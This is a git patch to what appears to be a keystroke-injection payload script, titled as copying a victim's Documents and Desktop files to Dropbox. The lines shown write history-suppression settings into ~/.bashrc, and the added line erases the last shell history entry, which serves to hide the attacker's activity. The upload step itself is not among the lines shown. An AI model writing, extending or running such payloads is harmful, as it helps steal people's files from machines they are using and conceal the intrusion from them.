From b7ffb2032f4cdf72c6c5bf197907ba5ede3f7692 Mon Sep 17 00:00:00 2001 From: Narsty Date: Thu, 22 Jun 2023 22:48:18 -0500 Subject: [PATCH] Update Docs and Desktop to Dropbox API.txt --- Executions/Docs and Desktop to Dropbox API.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/Executions/Docs and Desktop to Dropbox API.txt b/Executions/Docs and Desktop to Dropbox API.txt index 3f83ad7..977c4e6 100644 --- a/Executions/Docs and Desktop to Dropbox API.txt +++ b/Executions/Docs and Desktop to Dropbox API.txt @@ -19,6 +19,7 @@ DELAY 1000 ENTER DELAY 500 STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') DELAY 500 ENTER DELAY 500